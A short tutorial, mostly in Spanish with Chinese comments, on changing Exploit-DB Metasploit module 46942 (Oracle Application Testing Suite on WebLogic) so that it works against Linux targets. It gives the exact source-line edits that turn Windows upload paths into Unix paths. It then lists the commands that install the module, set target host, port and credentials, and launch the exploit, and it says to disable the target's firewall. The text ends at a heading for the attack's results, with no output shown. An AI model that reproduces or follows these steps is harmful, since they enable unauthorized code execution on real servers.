Fuente de esta exp: https://www.exploit-db.com/exploits/46942
De hecho, esta exp se puede reproducir con éxito en el entorno Linux, pero debe cambiar el código fuente descargado del sitio web oficial;
Línea de código fuente 62, puede ver que el último elemento es el método de representación de ruta en el sistema Windows, que debe cambiarse a la ruta correspondiente en el sistema Linux
OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 'C:\\OracleATS'])
#用如下代码替换
OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS','/root/Oracle/Middleware/user_projects/domains/'])
Código fuente línea 187, ibid
app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\servers\\AdminServer\\upload')
#用如下代码替换
app_path = Rex::FileUtils.normalize_unix_path(default_oats_path, 'base_domain/servers/AdminServer/upload')
Código fuente línea 238, igual que arriba
app_path = Rex::FileUtils.normalize_win_path(default_oats_path, "oats\\servers\\AdminServer\\upload\\#{war_name}.war")
#用如下代码替换
app_path = Rex::FileUtils.normalize_unix_path(default_oats_path, "base_domain/servers/AdminServer/upload/#{war_name}.war")
A continuación, importe el script en metasploit: vaya al directorio principal del script (aquí nombro el script 1.rb, aquí se reemplaza uno con su propio nombre de script)
sudo cp 1.rb /opt/metasploit-framework/embedded/framework/modules/exploits/
sudo chmod +x /opt/metasploit-framework/embedded/framework/modules/exploits/1.rb
Abra metasploit en la terminal y vuelva a cargar todos los scripts.
reload_all
#因为我将脚本命名为1.rb,所以metasploit导入脚本之后将其标记为1
use exploits/1
#可以看一下此脚本需要设置哪些参数
show options
#设置脚本需要的参数
set RHOSTS <ip>
set RPORT <port>
set OATSUSERNAME <weblogic_user_name>
set OATSPASSWORD <password>
Para la máquina de destino, debe instalar la versión weblogic que cumpla con los requisitos; luego cierre el firewall; luego siga los comandos anteriores en la máquina de ataque:
exploit
El efecto de ataque es el siguiente: